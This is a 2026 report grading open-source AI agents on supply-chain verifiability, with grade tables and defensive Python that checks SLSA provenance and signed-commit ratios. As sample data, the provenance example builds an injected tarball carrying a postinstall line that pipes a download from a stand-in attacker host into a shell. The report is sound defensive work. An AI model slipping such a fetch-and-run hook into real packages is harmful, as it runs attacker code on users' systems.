The State of AI Agent Supply-Chain Trust (2026)
2026 was the year AI agents stopped being demos and started being dependencies — wired into CI pipelines, handed cloud credentials, and granted tool access to real systems. It was also the year supply-chain attackers noticed. So we asked a simple question: how verifiable is the open-source AI agent ecosystem, really?
We graded 272 open-source AI agents on public, checkable supply-chain signals — build provenance, package provenance, signed commits, OSSF Scorecard, license, and maintenance — and rolled them into an evidence grade from A to D. Here's the picture.
The grade distribution
Evidence grade reflects how much of a project's trust can be independently verified from public data — not a verdict on whether it's "good" software. On that axis, the ecosystem is bottom-heavy.
| Grade | Agents | Share |
|---|---|---|
| A | 35 | 13% |
| B | 65 | 24% |
| C | 56 | 21% |
| D | 116 | 43% |
The provenance gap is the headline
The single most consequential finding: only 47 of 272 agents (17%) publish any build provenance. Of the 170 agents published to a package registry, 72% ship no package provenance, and 20% of all agents have zero signed commits. Provenance is what binds the artifact on the registry to a specific builder, source repository and commit; a version pushed with a stolen publish token has no attestation that matches it, which is what makes registry injection detectable. As the 2026 TrapDoor and TanStack/Mistral campaigns showed, it is the signal that matters most in practice, and most of the ecosystem can't offer it.
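What that check looks like in practice, as an added example (not code from this report or from HVTracker): the policy half of consuming a SLSA v1 provenance statement. It assumes the statement's signature (the DSSE/Sigstore envelope) has already been verified by a tool such as `gh attestation verify` or `cosign verify-attestation`, and it then asks the three questions that catch an injected release: is the downloaded artifact actually a subject of the statement, did a trusted builder produce it, and was it built from the project's own repository. The tarballs, digests, repository URL and builder id are all constructed for the example.

```python
"""Policy checks over a SLSA v1 provenance statement (in-toto Statement v1).

Added example; everything below is constructed.  Assumes the signature over
the statement was already verified (e.g. `gh attestation verify`,
`cosign verify-attestation`); this is the policy step that follows it.
"""
import hashlib
from typing import Optional

STATEMENT_V1 = "https://in-toto.io/Statement/v1"
SLSA_V1 = "https://slsa.dev/provenance/v1"

# Policy inputs (assumed values for the example).
EXPECTED_REPO = "https://github.com/example-org/agent"
HOSTED_BUILDER = "https://github.com/actions/runner/github-hosted"
TRUSTED_BUILDERS = frozenset({HOSTED_BUILDER})

# Constructed artifacts: the genuine release, and the same bytes with a payload
# appended, as an attacker with a stolen publish token would push.
GOOD_TARBALL = b"genuine release contents v1.2.3"
INJECTED_TARBALL = GOOD_TARBALL + b"\npostinstall: curl https://evil.invalid | sh"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_statement(artifact: bytes, repo: str, builder: str) -> dict:
    """Minimal in-toto Statement carrying SLSA v1 provenance for `artifact`.
    Field layout follows the SLSA v1 spec; the values are constructed."""
    return {
        "_type": STATEMENT_V1,
        "subject": [{"name": "agent-1.2.3.tar.gz",
                     "digest": {"sha256": sha256_hex(artifact)}}],
        "predicateType": SLSA_V1,
        "predicate": {
            "buildDefinition": {
                "buildType": "https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1",
                "externalParameters": {"workflow": {
                    "ref": "refs/tags/v1.2.3", "repository": repo,
                    "path": ".github/workflows/release.yml"}},
            },
            "runDetails": {"builder": {"id": builder}},
        },
    }


def check_provenance(artifact: bytes, statement: Optional[dict],
                     expected_repo: str = EXPECTED_REPO,
                     trusted_builders: frozenset = TRUSTED_BUILDERS) -> list:
    """Return the list of policy failures; empty means accept. Fails closed."""
    if statement is None:
        return ["no provenance statement published for this artifact"]
    if statement.get("_type") != STATEMENT_V1 or statement.get("predicateType") != SLSA_V1:
        return [f"not SLSA v1 provenance: {statement.get('_type')!r} / "
                f"{statement.get('predicateType')!r}"]

    failures = []
    # 1. The bytes you downloaded must be a subject of the statement.  An
    #    injected tarball has a different digest, so it fails here even if the
    #    attacker republished the genuine statement beside it.
    digest = sha256_hex(artifact)
    if not any(s.get("digest", {}).get("sha256") == digest
               for s in statement.get("subject", [])):
        failures.append(f"artifact sha256 {digest[:12]}... is not a subject of the statement")

    # 2. The build must have run on a builder you trust.  Whether the signing
    #    identity really matches this builder id is checked by the signature
    #    verification step assumed above.
    predicate = statement.get("predicate", {})
    builder = predicate.get("runDetails", {}).get("builder", {}).get("id")
    if builder not in trusted_builders:
        failures.append(f"builder {builder!r} is not in the trusted set")

    # 3. The source must be the project's own repository, not a fork.
    repo = (predicate.get("buildDefinition", {}).get("externalParameters", {})
            .get("workflow", {}).get("repository"))
    if repo != expected_repo:
        failures.append(f"built from {repo!r}, expected {expected_repo!r}")
    return failures


def demo() -> dict:
    """The scenarios behind the finding; returns each scenario's failure list."""
    genuine = make_statement(GOOD_TARBALL, EXPECTED_REPO, HOSTED_BUILDER)
    # Attacker builds the injected tarball from a fork and attests it themselves.
    attacker = make_statement(INJECTED_TARBALL, "https://github.com/attacker/agent-fork",
                              "https://attacker.invalid/builder")
    return {
        "genuine": check_provenance(GOOD_TARBALL, genuine),
        "injected, genuine statement reused": check_provenance(INJECTED_TARBALL, genuine),
        "injected, attacker statement": check_provenance(INJECTED_TARBALL, attacker),
        "no provenance at all": check_provenance(INJECTED_TARBALL, None),
    }


if __name__ == "__main__":
    for scenario, failures in demo().items():
        print(f"{scenario}: {'ACCEPT' if not failures else 'REJECT'}")
        for f in failures:
            print("  -", f)
```

The important design choice is that a missing statement is a rejection, not a pass: the 83% of agents with no build provenance simply cannot clear this check, which is the gap the report is describing.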
The top 10 by HVTrust
The highest-ranked agents share a profile: they publish provenance, sign commits, and score above the median on OSSF Scorecard. Popularity is conspicuously absent from that list — these rank on verifiability, not stars.
| # | Agent | Grade | OSSF Scorecard (0–10) |
|---|---|---|---|
| 1 | Haystack | A | 8.4 |
| 2 | LangGraph | A | 6.8 |
| 3 | n8n | A | 6.6 |
| 4 | Codex | A | 6.6 |
| 5 | Vercel AI SDK | A | 6.4 |
| 6 | Cline | A | 6.0 |
| 7 | OpenAI Agents SDK | A | 6.3 |
| 8 | PydanticAI | A | 6.1 |
| 9 | LiveKit Agents | A | 6.7 |
| 10 | MLflow | A | 5.6 |
MCP is now mainstream — and mostly unverifiable
45% of the agents we track now implement or declare a Model Context Protocol server, the interface that lets agents broker your credentials and tools. Of those, 76% ship no build provenance — meaning the components most likely to be granted system access are, as a group, among the hardest to verify. We dug into this in a separate report on MCP servers and trust.
What we measured (and what we didn't)
HVTrust is built from public, reproducible signals: OSSF Scorecard, build and package provenance, signed-commit ratio, license, maintenance freshness, and adoption — scaled by how much checkable evidence exists. Every number on every profile links back to its source.
What it is not is a judgment of code quality or capability. A high grade means a project does the boring, verifiable security work and you can confirm it; a low grade means a gap in public evidence, not a proven risk. Some signals reward newer practices like provenance, which can understate older but well-run projects. We publish the full methodology and the underlying data under CC BY 4.0 so you can check or rebuild any of this yourself.
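One of those signals, the signed-commit ratio, is cheap to reproduce yourself. The following is an added example (not HVTracker's code) that reads the `%G?` signature-status column git prints for `git log --format='%H %G?'` and separates "a signature is present" from "the signature verifies against a key I hold"; the log lines are constructed, and the script name in the usage line is hypothetical.

```python
"""Signed-commit ratio from `git log --format='%H %G?'` output.

Added example; the log lines are constructed.  %G? is git's signature-status
placeholder: G good signature, B bad signature, U good signature from a key
not trusted locally, X/Y/R good signature but expired or revoked key,
E signature present but not checkable (key unavailable), N no signature.
Usage against a real clone (script name is hypothetical):
    git log --format='%H %G?' origin/main | python signed_ratio.py -
"""
import sys
from collections import Counter

# Constructed sample of `git log --format='%H %G?'` output (short ids for brevity).
SAMPLE_LOG = """\
0a1f3c9e G
7b2d4e10 G
c3e5f6a2 U
d4f60b71 N
e5a718c3 N
f6b829d4 E
0c93ae55 G
1da4bf66 B
"""

VERIFIED = {"G", "U"}  # signature checks out against a key in the local keyring


def signed_commit_stats(log_text: str) -> dict:
    """Count %G? statuses.  'present' is what a public signal can observe
    (any signature at all); 'verified' depends on whose keyring runs the
    check, so report both.  A bad signature (B) is worse than none."""
    counts = Counter()
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        _commit, _, status = line.rpartition(" ")
        counts[status] += 1
    total = sum(counts.values())
    present = total - counts["N"]
    verified = sum(counts[s] for s in VERIFIED)
    return {
        "total": total,
        "present": present,
        "verified": verified,
        "bad": counts["B"],
        "present_ratio": present / total if total else 0.0,
        "verified_ratio": verified / total if total else 0.0,
    }


if __name__ == "__main__":
    text = sys.stdin.read() if sys.argv[1:] == ["-"] else SAMPLE_LOG
    stats = signed_commit_stats(text)
    print(f"{stats['present']}/{stats['total']} commits carry a signature "
          f"({stats['present_ratio']:.0%}), {stats['verified']} verify locally, "
          f"{stats['bad']} have a BAD signature")
```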
Explore the full registry
All 272 agents, every signal, refreshed throughout the day. Free, open data, no signup.
Browse the trust registry

Data from HVTracker signals as of June 21, 2026. Figures are a point-in-time snapshot and shift as the registry refreshes. Full methodology · Download the data. Related reports: MCP servers and trust · provenance vs. the 2026 attacks.